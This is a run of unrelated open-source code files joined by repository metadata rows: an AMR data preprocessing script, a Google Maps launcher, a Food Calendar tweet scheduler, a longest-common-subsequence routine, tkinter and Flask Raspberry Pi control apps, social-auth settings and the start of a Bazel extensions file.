if args.joined_dictionary:
assert not args.srcdict or not args.tgtdict, \
"cannot use both --srcdict and --tgtdict with --joined-dictionary"
if args.srcdict:
src_dict = task.load_dictionary(args.srcdict)
elif args.tgtdict:
src_dict = task.load_dictionary(args.tgtdict)
else:
assert args.trainpref, "--trainpref must be set if --srcdict is not specified"
src_dict = build_dictionary(
{train_path(lang) for lang in [args.source_lang, args.target_lang]}, src=True
)
tgt_dict = src_dict
else:
if args.srcdict:
src_dict = task.load_dictionary(args.srcdict)
else:
assert args.trainpref, "--trainpref must be set if --srcdict is not specified"
src_dict = build_dictionary([train_path(args.source_lang)], src=True)
if target:
if args.tgtdict:
tgt_dict = task.load_dictionary(args.tgtdict)
else:
assert args.trainpref, "--trainpref must be set if --tgtdict is not specified"
tgt_dict = build_dictionary([train_path(args.target_lang_nopos)], tgt=True)
else:
tgt_dict = None
src_dict.save(dict_path(args.source_lang))
if target and tgt_dict is not None:
tgt_dict.save(dict_path(args.target_lang_nopos))
# save binarized preprocessed files
def make_binary_dataset(vocab, input_prefix, output_prefix, lang, num_workers):
print("| [{}] Dictionary: {} types".format(lang, len(vocab) - 1))
n_seq_tok = [0, 0]
replaced = Counter()
def merge_result(worker_result):
replaced.update(worker_result["replaced"])
n_seq_tok[0] += worker_result["nseq"]
n_seq_tok[1] += worker_result["ntok"]
input_file = "{}{}".format(
input_prefix, ("." + lang) if lang is not None else ""
)
offsets = Binarizer.find_offsets(input_file, num_workers)
pool = None
if num_workers > 1:
pool = Pool(processes=num_workers - 1)
for worker_id in range(1, num_workers):
prefix = "{}{}".format(output_prefix, worker_id)
pool.apply_async(
binarize,
(
args,
input_file,
vocab,
prefix,
lang,
offsets[worker_id],
offsets[worker_id + 1],
False, # note here we shut off append eos
tokenize
),
callback=merge_result
)
pool.close()
ds = indexed_dataset.make_builder(dataset_dest_file(args, output_prefix, lang, "bin"),
impl=args.dataset_impl, vocab_size=len(vocab), dtype=np.int64)
merge_result(
Binarizer.binarize(
input_file, vocab, lambda t: ds.add_item(t),
offset=0, end=offsets[1],
append_eos=False,
tokenize=tokenize
)
)
if num_workers > 1:
pool.join()
for worker_id in range(1, num_workers):
prefix = "{}{}".format(output_prefix, worker_id)
temp_file_path = dataset_dest_prefix(args, prefix, lang)
ds.merge_file_(temp_file_path)
os.remove(indexed_dataset.data_file_path(temp_file_path))
os.remove(indexed_dataset.index_file_path(temp_file_path))
ds.finalize(dataset_dest_file(args, output_prefix, lang, "idx"))
print(
"| [{}] {}: {} sents, {} tokens, {:.3}% replaced by {}".format(
lang,
input_file,
n_seq_tok[0],
n_seq_tok[1],
100 * sum(replaced.values()) / n_seq_tok[1],
vocab.unk_word,
)
)
def make_dataset(vocab, input_prefix, output_prefix, lang, num_workers=1, dataset_impl=args.dataset_impl):
if dataset_impl == "raw":
# Copy original text file to destination folder
output_text_file = dest_path(
output_prefix + ".{}-{}".format(args.source_lang, args.target_lang),
lang,
)
shutil.copyfile(file_name(input_prefix, lang), output_text_file)
else:
make_binary_dataset(vocab, input_prefix, output_prefix, lang, num_workers)
def make_all(lang, vocab, dataset_impl=args.dataset_impl):
if args.trainpref:
make_dataset(vocab, args.trainpref, "train", lang, num_workers=args.workers, dataset_impl=dataset_impl)
if args.validpref:
for k, validpref in enumerate(args.validpref.split(",")):
outprefix = "valid{}".format(k) if k > 0 else "valid"
make_dataset(vocab, validpref, outprefix, lang, num_workers=args.workers, dataset_impl=dataset_impl)
if args.testpref:
for k, testpref in enumerate(args.testpref.split(",")):
outprefix = "test{}".format(k) if k > 0 else "test"
make_dataset(vocab, testpref, outprefix, lang, num_workers=args.workers, dataset_impl=dataset_impl)
# NOTE we do not encode the source sentences with dictionary, as the source embeddings are directly provided
# from RoBERTa, thus the source dictionary here is of no use
if run_basic:
make_all(args.source_lang, src_dict, dataset_impl='raw')
make_all(args.source_lang, src_dict, dataset_impl='mmap')
# above: just leave for the sake of model to run without too much change
# NOTE there are <unk> in valid and test set for target actions
if target:
make_all(args.target_lang_nopos, tgt_dict)
# binarize pointer values and save to file
# TODO make naming convention clearer
# assume one training file, one validation file, and one test file
for pos_file, split in [(f'{pref}.actions_pos', split) for pref, split in
[(args.trainpref, 'train'), (args.validpref, 'valid'), (args.testpref, 'test')]]:
out_pref = os.path.join(args.destdir, split)
task.binarize_actions_pointer_file(pos_file, out_pref)
# for dynamic oracle: copy the gold amr with alignments to the data folder
if args.task == 'amr_action_pointer_bart_dyo':
for pref, split in [(args.trainpref, 'train'), (args.validpref, 'valid'), (args.testpref, 'test')]:
if split == 'valid':
split_amr = 'ref_dev.amr'
else:
split_amr = f'ref_{split}.amr'
shutil.copyfile(
os.path.join(os.path.dirname(pref), split_amr),
os.path.join(args.destdir, f'{split}.aligned.gold-amr')
)
# save action states information to assist training with auxiliary info
# assume one training file, one validation file, and one test file
if run_act_states:
task_obj = task(args, tgt_dict=tgt_dict)
for prefix, split in zip([args.trainpref, args.validpref, args.testpref], ['train', 'valid', 'test']):
en_file = prefix + '.en'
actions_file = prefix + '.actions'
machine_config_file = os.path.join(os.path.dirname(prefix), 'machine_config.json')
out_file_pref = os.path.join(args.destdir, split)
task_obj.build_actions_states_info(en_file, actions_file, machine_config_file, out_file_pref,
num_workers=args.workers)
# create empty file flag
open(os.path.join(args.destdir, '.done'), 'w').close()
# save RoBERTa embeddings
# TODO refactor this code
if run_roberta_emb:
make_bart_encodings(args, tokenize=tokenize)
# create empty file flag
open(os.path.join(args.embdir, '.done'), 'w').close()
print("| Wrote preprocessed oracle data to {}".format(args.destdir))
print("| Wrote preprocessed embedding data to {}".format(args.embdir))
def binarize(args, filename, vocab, output_prefix, lang, offset, end, append_eos=False, tokenize=tokenize_line):
ds = indexed_dataset.make_builder(dataset_dest_file(args, output_prefix, lang, "bin"),
impl=args.dataset_impl, vocab_size=len(vocab), dtype=np.int64)
def consumer(tensor):
ds.add_item(tensor)
res = Binarizer.binarize(filename, vocab, consumer, append_eos=append_eos,
offset=offset, end=end, tokenize=tokenize)
ds.finalize(dataset_dest_file(args, output_prefix, lang, "idx"))
return res
def dataset_dest_prefix(args, output_prefix, lang):
base = "{}/{}".format(args.destdir, output_prefix)
lang_part = (
".{}-{}.{}".format(args.source_lang, args.target_lang, lang) if lang is not None else ""
)
return "{}{}".format(base, lang_part)
def dataset_dest_file(args, output_prefix, lang, extension):
base = dataset_dest_prefix(args, output_prefix, lang)
return "{}.{}".format(base, extension)
def cli_main():
parser = options.get_preprocessing_parser()
args = parser.parse_args()
main(args)
if __name__ == "__main__":
cli_main()
| 43.021212 | 127 | 0.625484 |
ace72f23957ef90989b9be0a79f06496d5aa5873 | 321 | py | Python | webscrape.py | V-FOR-VEND3TTA/maps-automation | c5627f01b2aaa95a5c8a5f470fb5686166a1b9fd | [
"MIT"
] | null | null | null | webscrape.py | V-FOR-VEND3TTA/maps-automation | c5627f01b2aaa95a5c8a5f470fb5686166a1b9fd | [
"MIT"
] | null | null | null | webscrape.py | V-FOR-VEND3TTA/maps-automation | c5627f01b2aaa95a5c8a5f470fb5686166a1b9fd | [
"MIT"
] | null | null | null | import webbrowser
import sys
import pyperclip
if len(sys.argv) > 1:
# Get address from command line
address = ''.join(sys.argv[1:])
else:
# Get address from clipboard
address = pyperclip.paste()
webbrowser.open('https://www.google.com/maps/place/' + address)
# 19 Ameshoff St, Johannesburg | 22.928571 | 64 | 0.672897 |
ace72f3a769a9beca0dc24989f95b980d75069b4 | 1,399 | py | Python | match.py | toeybaa/FCN | 062719f85f78d7fb933f6271759bb8b644d2d592 | [
"BSD-2-Clause"
] | 1 | 2016-06-22T05:35:51.000Z | 2016-06-22T05:35:51.000Z | match.py | toeybaa/FCN | 062719f85f78d7fb933f6271759bb8b644d2d592 | [
"BSD-2-Clause"
] | null | null | null | match.py | toeybaa/FCN | 062719f85f78d7fb933f6271759bb8b644d2d592 | [
"BSD-2-Clause"
] | null | null | null | import sys, os
from draw_result import vispair
def pair():
a = sorted(os.listdir('/home/peth/Databases/rPascal/features/caffe/queries/'))
for i in xrange(0,len(a)):
print a[i].rstrip(".npy")
print 'Choose a query image from above files...'
path = raw_input("Query Image? : ")
with open("/home/peth/Databases/rPascal/most_similar_pair.txt") as file:
checker = False
data = file.readlines()
for line in data:
word = line.split()
if word[0] == path and not checker:
# print word[1]
# print type(word[1])
print "Query founded, Showing the result via X-Server"
vispair(str(word[0]), str(word[1]))
checker = True
# print "Query Image is: " + str(word[0]) + " <==> Most similar Image is: " + str(word[1])
dist(str(word[0]),str(word[1]))
break
if checker is False:
print "File not found, Exiting the program..."
def dist(q, r):
with open('/home/peth/Databases/rPascal/dist_pair.txt') as file:
data = file.readlines()
for line in data:
word = line.split()
if word[0] == q:
print "Query Image is: " + q + " <==> Most similar Image is: " + r + " <==> Distance is: " + word[1]
if __name__ == "__main__":
pair()
| 35.871795 | 116 | 0.533238 |
ace73055ab613e0f3db13c8e5d03c420fdd8f8fe | 1,845 | py | Python | processmain.py | SkyfallenHQ/CoProvider-Daemon | 57cc2eb44f21c053db39313840c23c754a0143be | [
"MIT"
] | 1 | 2021-03-01T07:43:32.000Z | 2021-03-01T07:43:32.000Z | processmain.py | SkyfallenHQ/CoProvider-Daemon | 57cc2eb44f21c053db39313840c23c754a0143be | [
"MIT"
] | null | null | null | processmain.py | SkyfallenHQ/CoProvider-Daemon | 57cc2eb44f21c053db39313840c23c754a0143be | [
"MIT"
] | null | null | null | # ____ _ __ _ _ #
# / ___|| | ___ _ / _| __ _| | | ___ _ __ #
# \___ \| |/ / | | | |_ / _` | | |/ _ \ '_ \ #
# ___) | <| |_| | _| (_| | | | __/ | | |#
# |____/|_|\_\\__, |_| \__,_|_|_|\___|_| |_|#
# |___/ #########
# ____ ____ _ _ #
# / ___|___ | _ \ _ __ _____ _(_) __| | ___ _ __ #
# | | / _ \| |_) | '__/ _ \ \ / / |/ _` |/ _ \ '__|#
# | |__| (_) | __/| | | (_) \ V /| | (_| | __/ | #
# \____\___/|_| |_| \___/ \_/ |_|\__,_|\___|_| #
# #
###########################################################################
# (C) 2021 - Skyfallen Developers #
# Skyfallen CoProvider Beta #
# Manage your containerized servers with ease. #
# ----DAEMON CODE---- #
# This file runs everything #
###########################################################################
import flask
from Endpoints import Root
import sqlite3
from os import path
from DB import Initiator
class CoProviderFramework:
def HandleDaemon(self):
app = flask.Flask(__name__)
dbNeedsInit = False
if (path.exists('CPFD_DB.db') == False):
dbNeedsInit = True
conn = sqlite3.connect('CPFD_DB.db')
if(dbNeedsInit):
Initiator.SQLInitiator.createTables(conn)
@app.errorhandler(404)
def route404(e):
return Root.APIEndpoint.serveNotFound()
@app.route('/createServer/')
def RouteCreateServer():
return Root.APIEndpoint.serveCreate(flask.request)
app.run() | 36.176471 | 76 | 0.374526 |
ace731087913c6a41d14bcd62c8e9dc7105530c5 | 6,787 | py | Python | FoodCalendar/foodcalendertweets.py | contradirony/TwitterFoodCalendar | 8406d4340457cebe7f70c453c1041196634946fa | [
"MIT"
] | null | null | null | FoodCalendar/foodcalendertweets.py | contradirony/TwitterFoodCalendar | 8406d4340457cebe7f70c453c1041196634946fa | [
"MIT"
] | null | null | null | FoodCalendar/foodcalendertweets.py | contradirony/TwitterFoodCalendar | 8406d4340457cebe7f70c453c1041196634946fa | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import recipe as rc
import re
from random import randint
import time
import json
import requests
import os
import sys
#pip install --upgrade google-api-python-client
from googleapiclient.discovery import build
os.chdir(os.path.dirname(sys.argv[0]))
def google_url_shorten(url, api_key):
# remember to enable https://console.developers.google.com/apis/api/urlshortener.googleapis.com/
req_url = 'https://www.googleapis.com/urlshortener/v1/url?key=' + api_key
payload = {'longUrl': url}
headers = {'content-type': 'application/json'}
r = requests.post(req_url, data=json.dumps(payload), headers=headers)
resp = json.loads(r.text)
return resp['id']
def google_search(search_term, api_key, cse_id, **kwargs):
service = build("customsearch", "v1", developerKey=api_key)
res = service.cse().list(q=search_term, cx=cse_id, **kwargs).execute()
return res['items']
def export_recipe_tweet(foodimage='', foodurl='', recipename='', recipeid='', googleAPIkey='', ingredient=''):
''' input image, url, recipename for text, id for reference and process image and append tweet to scheduler'''
foodurlshort = google_url_shorten(foodurl, googleAPIkey)
recipenamefix = recipename.lower().replace(" ", "").replace("'", "")
foodtext = '''Today's recipe is {}: {} {}'''.format(recipename, foodurlshort, '#recipeoftheday')
if foodimage != '':
ingredientname=ingredient.lower().replace(" ", "").replace("'", "")
imagename = '''images/{}_{}_{}.jpg'''.format(time.strftime('%Y-%m-%d'), ingredientname, recipeid)
imagenamepath = '''{}/{}'''.format(os.getcwd(), imagename)
os.system("wget -O {0} {1}".format(imagenamepath, foodimage))
res = create_tweet(content=foodtext, image=imagenamepath, scheduledate=time.strftime('%Y-%m-%d'),
scheduletime='{}:{}'.format(str(randint(14,16)).zfill(2), str(randint(0,59)).zfill(2)))
return res
def create_tweet(savefile='/HOME_PATH/YOUR_FOLDER_NAME/TweetSchedule.txt', content='',
image='', scheduledate='2017-05-06', scheduletime='07:00'):
''' format tweet as follows for scheduler and append:
a|Example tweet with attachment|image name.jpg|2017-03-26@00:00
'''
tweet_format='a'+'|'+content+'|'+image+'|'+scheduledate+'@'+scheduletime
with open(savefile, 'a') as file:
file.write('\n'+tweet_format)
# TODO: should really be replaced with proper error handling...
if len(content) > 140:
return 'Tweet too long'
else:
return 'Tweet created'
def main():
authdetailsdf=pd.read_csv("authdetails.csv", sep=';')
authdetails=dict(zip(list(authdetailsdf.key), list(authdetailsdf.value)))
googleAPIkey = authdetails['googleAPIkey']
csname = authdetails['googlecsname']
spoon_api_key = authdetails['spoon_api_key']
fooddata = pd.read_csv("fooddaysSimple.csv", sep='\t')
todayday = int(time.strftime('%d'))
todaymonth = int(time.strftime('%m'))
monthday = np.all([fooddata.Month==todaymonth, fooddata.Day==todayday], axis=0)
datatoday = fooddata[monthday]
# TODO: should write unit tests for three cases...
if datatoday.shape[0]>0:
ingredient = datatoday['Food'].values[0]
# there is a national food day entry
nationalday = 'National '+ingredient+' Day!'
hashtag = '#'+'national'+ingredient.lower().replace(" ", "").replace("'", "")+'day'
# get top google result for information about the day
results = google_search(nationalday, googleAPIkey, csname, num=1)
dayurlshort = google_url_shorten(results[0]['link'], googleAPIkey)
# create one tweet for this
nationaldaytweet = '''Happy {} Learn more about it at: {} {}'''.format(nationalday, dayurlshort, hashtag)
create_tweet(content=nationaldaytweet, scheduledate=time.strftime('%Y-%m-%d'),
scheduletime='{}:{}'.format(str(randint(6,9)).zfill(2), str(randint(0,59)).zfill(2)))
# get recipes that has the national food day in it as an ingredient
# can be extended with starter, main, and dessert
a=rc.RecipeClient(spoon_api_key)
recipes=a.find_by_ingredients(ingredient)
if len(recipes)>0:
recipesdf = pd.DataFrame(recipes)
recipesdf.sort_values(['likes', 'missedIngredientCount'], ascending=[False, False], inplace=True) #recipesdf.sort(['likes', 'missedIngredientCount'], ascending=[False, False], inplace=True)
foodimageSpoon = recipesdf.iloc[0]['image']
foodurlSpoon = re.sub('.png','', re.sub('.jpg', '', re.sub('recipeImages', 'recipe', foodimageSpoon)))
recipenameSpoon = recipesdf.iloc[0]['title']
recipeidSpoon = recipesdf.iloc[0]['id']
res = export_recipe_tweet(foodimage=foodimageSpoon, foodurl=foodurlSpoon, recipename=recipenameSpoon,\
recipeid=recipeidSpoon, googleAPIkey=googleAPIkey, ingredient=ingredient)
print(res)
else:
googlerecipe = google_search(ingredient+' recipe', googleAPIkey, csname, num=1)
foodurlGoogle = googlerecipe[0]['link']
foodimageGoogle = googlerecipe[0]['pagemap']['cse_image'][0]['src']
recipenameGoogle = ingredient
res = export_recipe_tweet(foodimage=foodimageGoogle, foodurl=foodurlGoogle, recipename=recipenameGoogle,\
recipeid='google', googleAPIkey=googleAPIkey, ingredient=ingredient)
print(res)
else:
a=rc.RecipeClient(spoon_api_key)
# get random joke
jokeattempt=0
joke = a.random_joke()
while jokeattempt <5:
if len(joke['text']) < 141:
create_tweet(content=joke['text'], scheduledate=time.strftime('%Y-%m-%d'),
scheduletime='{}:{}'.format(str(randint(8,12)).zfill(2), str(randint(0,59)).zfill(2)))
jokeattempt=100
break
else:
joke = a.random_joke()
jokeattempt+=1
# ge random trivia
triviaattempt=0
trivia = a.random_trivia()
while triviaattempt <5:
if len(trivia['text']) < 141-len('Food fact: '):
foodfact='Food fact: '+trivia['text']
create_tweet(content=foodfact, scheduledate=time.strftime('%Y-%m-%d'),
scheduletime='{}:{}'.format(str(randint(14,18)).zfill(2), str(randint(0,59)).zfill(2)))
triviaattempt=100
break
else:
trivia = a.random_trivia()
triviaattempt+=1
print('Joke and trivia for today')
if __name__ == '__main__':
main()
| 48.827338 | 201 | 0.63047 |
ace7313f5ee87a2e9be9131a84245779c4295df8 | 1,125 | py | Python | pdfgridder/socialsettings.py | PDFGridder/PDFGridder | 94bc6e76eadc3799905c905a70228fcd6b30c4fb | [
"MIT"
] | 2 | 2016-09-07T18:32:44.000Z | 2016-11-24T19:45:06.000Z | pdfgridder/socialsettings.py | PDFGridder/PDFGridder | 94bc6e76eadc3799905c905a70228fcd6b30c4fb | [
"MIT"
] | null | null | null | pdfgridder/socialsettings.py | PDFGridder/PDFGridder | 94bc6e76eadc3799905c905a70228fcd6b30c4fb | [
"MIT"
] | null | null | null | import os
TWITTER_CONSUMER_KEY = os.environ['TWITTER_CONSUMER_KEY']
TWITTER_CONSUMER_SECRET = os.environ['TWITTER_CONSUMER_SECRET']
TWITTER_REQUEST_TOKEN_URL = 'http://twitter.com/oauth/request_token'
TWITTER_ACCESS_TOKEN_URL = 'http://twitter.com/oauth/access_token'
TWITTER_AUTHORIZATION_URL = 'http://twitter.com/oauth/authorize'
FACEBOOK_APP_ID = os.environ['FACEBOOK_APP_ID']
FACEBOOK_API_KEY = os.environ['FACEBOOK_API_KEY']
FACEBOOK_API_SECRET = os.environ['FACEBOOK_API_SECRET']
SOCIAL_AUTH_ASSOCIATE_BY_MAIL = True
SOCIAL_AUTH_PIPELINE = (
'social_auth.backends.pipeline.social.social_auth_user',
'social_auth.backends.pipeline.misc.save_status_to_session',
'users.social_auth.pipeline.ask_email',
'users.social_auth.pipeline.associate_by_email',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details'
)
GOOGLE_ANALYTICS_UA = os.environ['GOOGLE_ANALYTICS_UA']
| 38.793103 | 68 | 0.809778 |
ace7315479e41abe05fda4df842d0995d23347c4 | 553 | py | Python | deck.py | igorbrodzinski/blackjack-terminal-game | 298241aff2a8096d7d27a50899e515e94cfda928 | [
"MIT"
] | null | null | null | deck.py | igorbrodzinski/blackjack-terminal-game | 298241aff2a8096d7d27a50899e515e94cfda928 | [
"MIT"
] | null | null | null | deck.py | igorbrodzinski/blackjack-terminal-game | 298241aff2a8096d7d27a50899e515e94cfda928 | [
"MIT"
] | null | null | null | from card import Card
from suit import Suit
from rank import Rank
from typing import List
from random import randint, shuffle
class Deck:
cards: List[Card]
def __init__(self) -> None:
self.initialize_deck()
def initialize_deck(self) -> None:
self.cards = [Card(rank, suit) for rank in Rank for suit in Suit]
shuffle(self.cards)
def draw_card(self) -> Card:
return self.cards.pop(randint(0, len(self.cards)-1))
def reset_deck(self) -> None:
self.initialize_deck()
| 23.041667 | 74 | 0.636528 |
ace73156cdb53722f006362dec4495f6eb8dc662 | 2,493 | py | Python | rpiWebServer/app.py | lishaprakash/flowmeter | db3e072e6876466f58ceb2573f468ae899de880d | [
"Apache-2.0"
] | null | null | null | rpiWebServer/app.py | lishaprakash/flowmeter | db3e072e6876466f58ceb2573f468ae899de880d | [
"Apache-2.0"
] | null | null | null | rpiWebServer/app.py | lishaprakash/flowmeter | db3e072e6876466f58ceb2573f468ae899de880d | [
"Apache-2.0"
] | null | null | null | '''
Raspberry Pi GPIO Status and Control
'''
import RPi.GPIO as GPIO
from flask import Flask, render_template, request
app = Flask(__name__)
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
#define sensors GPIOs
button = 20
senPIR = 16
#define actuators GPIOs
ledRed = 13
ledYlw = 19
ledGrn = 26
#initialize GPIO status variables
buttonSts = 0
senPIRSts = 0
ledRedSts = 0
ledYlwSts = 0
ledGrnSts = 0
# Define button and PIR sensor pins as an input
GPIO.setup(button, GPIO.IN)
GPIO.setup(senPIR, GPIO.IN)
# Define led pins as output
GPIO.setup(ledRed, GPIO.OUT)
GPIO.setup(ledYlw, GPIO.OUT)
GPIO.setup(ledGrn, GPIO.OUT)
# turn leds OFF
GPIO.output(ledRed, GPIO.LOW)
GPIO.output(ledYlw, GPIO.LOW)
GPIO.output(ledGrn, GPIO.LOW)
@app.route("/")
def index():
# Read GPIO Status
# buttonSts = GPIO.input(button)
# senPIRSts = GPIO.input(senPIR)
# ledRedSts = GPIO.input(ledRed)
# ledYlwSts = GPIO.input(ledYlw)
# ledGrnSts = GPIO.input(ledGrn)
# templateData = {
# 'button' : buttonSts,
# 'senPIR' : senPIRSts,
# 'ledRed' : ledRedSts,
# 'ledYlw' : ledYlwSts,
# 'ledGrn' : ledGrnSts,
# }
templateData = {
'name' : 'Jason'
}
return render_template('index_initial.html',**templateData)
@app.route("/<username>")
def show_username(username):
templateData = {
'name': username
}
return render_template('index_initial.html',**templateData)
@app.route("/gif")
def show_gif():
templateData = {
'name': 'Dumbass'
}
return render_template('index_initial.html',**templateData)
# The function below is executed when someone requests a URL with the actuator name and action in it:
@app.route("/<deviceName>/<action>")
def action(deviceName, action):
if deviceName == 'ledRed':
actuator = ledRed
if deviceName == 'ledYlw':
actuator = ledYlw
if deviceName == 'ledGrn':
actuator = ledGrn
if action == "on":
GPIO.output(actuator, GPIO.HIGH)
if action == "off":
GPIO.output(actuator, GPIO.LOW)
buttonSts = GPIO.input(button)
senPIRSts = GPIO.input(senPIR)
ledRedSts = GPIO.input(ledRed)
ledYlwSts = GPIO.input(ledYlw)
ledGrnSts = GPIO.input(ledGrn)
templateData = {
'button' : buttonSts,
'senPIR' : senPIRSts,
'ledRed' : ledRedSts,
'ledYlw' : ledYlwSts,
'ledGrn' : ledGrnSts,
}
return render_template('index.html', **templateData)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
| 22.663636 | 101 | 0.666667 |
ace7315e5d5f25f71f6aaef6240e4eba44f8ca2c | 1,956 | py | Python | LongestCommonSubseq.py | iamkartik/Algorithms | 0ac5c8e90e0cd08ece99ad53f592b6fb283d86b0 | [
"MIT"
] | null | null | null | LongestCommonSubseq.py | iamkartik/Algorithms | 0ac5c8e90e0cd08ece99ad53f592b6fb283d86b0 | [
"MIT"
] | null | null | null | LongestCommonSubseq.py | iamkartik/Algorithms | 0ac5c8e90e0cd08ece99ad53f592b6fb283d86b0 | [
"MIT"
] | null | null | null | import numpy as np
def lcs(a,b,c,m,n,p,t):
if m<0 or n<0 or p<0:
# print(t)
return 0
else:
if a[m]==b[n]==c[p]:
t=f'{t}{a[m]}'
return 1+lcs(a,b,c,m-1,n-1,p-1,t)
else:
return max(
lcs(a,b,c,m-1,n,p,t),
lcs(a,b,c,m,n-1,p,t),
lcs(a,b,c,m,n,p-1,t)
)
def lcsdp(a,b,c):
m=len(a)
n=len(b)
p=len(c)
t=""
dp=np.zeros((m+1,n+1,p+1))
# print(dp)
for i in range(m+1):
for j in range(n+1):
for k in range(p+1):
if i==0 or j==0 or k==0:
continue
if a[i-1]==b[j-1]==c[k-1]:
dp[i][j][k]=dp[i-1][j-1][k-1]+1
else:
dp[i][j][k] = max(
dp[i-1][j][k],
dp[i][j-1][k],
dp[i][j][k-1]
)
print(dp[m][n][p])
print(i,m,j,n,k,p)
str=""
while i>0 and j>0 and k>0:
# print(i,j,k)
if a[i-1]==b[j-1]==c[k-1]:
print(a[i-1])
str=f'{a[i-1]}{str}'
i-=1
j-=1
k-=1
# print(i,j,k)
else:
n1=dp[i-1][j][k]
n2=dp[i][j-1][k]
n3=dp[i][j][k-1]
if n1>=n2 and n1>=n3:
i-=1
elif n2>=n1 and n2>=n3:
j-=1
elif n3>=n1 and n3>=n2:
k-=1
else:
print('##',n1,n2,n3)
print(str)
if __name__ == "__main__":
a="6662220542630314443712"
# a="ACHCGGTCGAGTTGCGCGGAHAGCCLGGCCGAA"
b="00078321207413782377777"
# b="GTCXGTTCGDGAATGFCGTTGCTOTGTAAA"
c="6664664567861104057425"
# c="AKLGTCGTCGGAAUIOGCCGGCCGAA"
m=len(a)
n=len(b)
p=len(c)
t=""
print(m)
# test=lcs(a,b,c,m-1,n-1,p-1,t)
lcsdp(a,b,c)
| 22.227273 | 51 | 0.367076 |
ace7319cf23e42df940004b278438542b294c870 | 4,125 | py | Python | src/m2_tkinter_as_mqtt_sender.py | vandensp/25-TkinterAndMQTT | f8ab2a274765b07bba05966594d5bd2acaee6e68 | [
"MIT"
] | null | null | null | src/m2_tkinter_as_mqtt_sender.py | vandensp/25-TkinterAndMQTT | f8ab2a274765b07bba05966594d5bd2acaee6e68 | [
"MIT"
] | null | null | null | src/m2_tkinter_as_mqtt_sender.py | vandensp/25-TkinterAndMQTT | f8ab2a274765b07bba05966594d5bd2acaee6e68 | [
"MIT"
] | null | null | null | """
Using a fake robot as the receiver of messages.
"""
# Done: 1. In mqtt_remote_method_calls, set LEGO_NUMBER at line 131
# to YOUR robot's number.
# Done: 2. Copy your Tkinter/ttk ROBOT gui code from the previous session (m6).
# Then modify it so that pressing a button sends a message to a teammate
# of the form:
# (for Forward)
# ["forward", X, y]
# where X and Y are from the entry box.
#
"""
This project lets you try out Tkinter/Ttk and practice it!
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Mark Hays, Amanda Stouder, Aaron Wilkin, their colleagues,
and Samuel VanDenburgh.
""" # Done: 1. PUT YOUR NAME IN THE ABOVE LINE.
import tkinter
from tkinter import ttk
def main():
""" Constructs a GUI that will be used MUCH later to control EV3. """
# -------------------------------------------------------------------------
# Done: 2. Follow along with the video to make a remote control GUI
# For every grid() method call you will add a row and a column argument
# -------------------------------------------------------------------------
root = tkinter.Tk()
root.title("MQTT Remote")
main_frame = ttk.Frame(root, padding=20)
main_frame.grid() # only grid call that does NOT need a row and column
left_speed_label = ttk.Label(main_frame, text="Left")
left_speed_label.grid()
left_speed_entry = ttk.Entry(main_frame, width=8)
left_speed_entry.insert(0, "600")
left_speed_entry.grid()
right_speed_label = ttk.Label(main_frame, text="Right")
right_speed_label.grid()
right_speed_entry = ttk.Entry(main_frame, width=8, justify=tkinter.RIGHT)
right_speed_entry.insert(0, "600")
right_speed_entry.grid()
forward_button = ttk.Button(main_frame, text="Forward")
forward_button.grid()
forward_button['command'] = lambda: print("Forward button")
root.bind('<Up>', lambda event: print("Forward key"))
left_button = ttk.Button(main_frame, text="Left")
left_button.grid()
left_button['command'] = lambda: print("Left button")
root.bind('<Left>', lambda event: print("Left key"))
stop_button = ttk.Button(main_frame, text="Stop")
stop_button.grid()
stop_button['command'] = lambda: print("Stop button")
root.bind('<space>', lambda event: print("Stop key"))
right_button = ttk.Button(main_frame, text="Right")
right_button.grid()
right_button['command'] = lambda: print("Right button")
root.bind('<Right>', lambda event: print("Right key"))
back_button = ttk.Button(main_frame, text="Back")
back_button.grid()
back_button['command'] = lambda: print("Back button")
root.bind('<Down>', lambda event: print("Back key"))
up_button = ttk.Button(main_frame, text="Up")
up_button.grid()
up_button['command'] = lambda: print("Up button")
root.bind('<u>', lambda event: print("Up key"))
down_button = ttk.Button(main_frame, text="Down")
down_button.grid()
down_button['command'] = lambda: print("Down button")
root.bind('<j>', lambda event: print("Down key"))
# Buttons for quit and exit
q_button = ttk.Button(main_frame, text="Quit")
q_button.grid()
q_button['command'] = lambda: print("Quit button")
e_button = ttk.Button(main_frame, text="Exit")
e_button.grid()
e_button['command'] = lambda: exit()
left_button.grid(row = 3, column = 0)
left_speed_entry.grid(row = 1, column = 0)
left_speed_label.grid(row = 0, column = 0)
forward_button.grid(row = 2, column = 1)
stop_button.grid(row = 3, column = 1)
back_button.grid(row = 4, column = 1)
right_button.grid(row = 3, column = 2)
right_speed_entry.grid(row = 1, column = 2)
right_speed_label.grid(row = 0, column = 2)
up_button.grid(row = 5, column = 0)
down_button.grid(row = 6, column = 0)
q_button.grid(row = 5, column = 2)
e_button.grid(row = 6, column = 2)
root.mainloop()
def forward(left_entry, right_entry, mqtt_client):
x = left_entry.get()
y = right_entry.get()
mqtt_client.send_message("forward", [x, y])
main()
| 33.536585 | 79 | 0.644121 |
ace7333688bca64ca675939bad4cde1ea344adf1 | 2,059 | bzl | Python | source/extensions/all_extensions.bzl | haorenfsa/envoy | c2b0d37ca5b40b71ce48984f2cf5984297b79a71 | [
"Apache-2.0"
] | 1 | 2020-06-02T17:21:13.000Z | 2020-06-02T17:21:13.000Z | source/extensions/all_extensions.bzl | haorenfsa/envoy | c2b0d37ca5b40b71ce48984f2cf5984297b79a71 | [
"Apache-2.0"
] | null | null | null | source/extensions/all_extensions.bzl | haorenfsa/envoy | c2b0d37ca5b40b71ce48984f2cf5984297b79a71 | [
"Apache-2.0"
] | null | null | null | load("@bazel_skylib//lib:dicts.bzl", "dicts")
load("@envoy_build_config//:extensions_build_config.bzl", "EXTENSIONS")
# These extensions are registered using the extension system but are required for the core Envoy build.
# The map may be overridden by extensions specified in envoy_build_config.
_required_extensions = {
"envoy.common.crypto.utility_lib": "//source/extensions/common/crypto:utility_lib",
"envoy.transport_sockets.tls": "//source/extensions/transport_sockets/tls:config",
}
# Return all extensions to be compiled into Envoy.
def envoy_all_extensions(denylist = []):
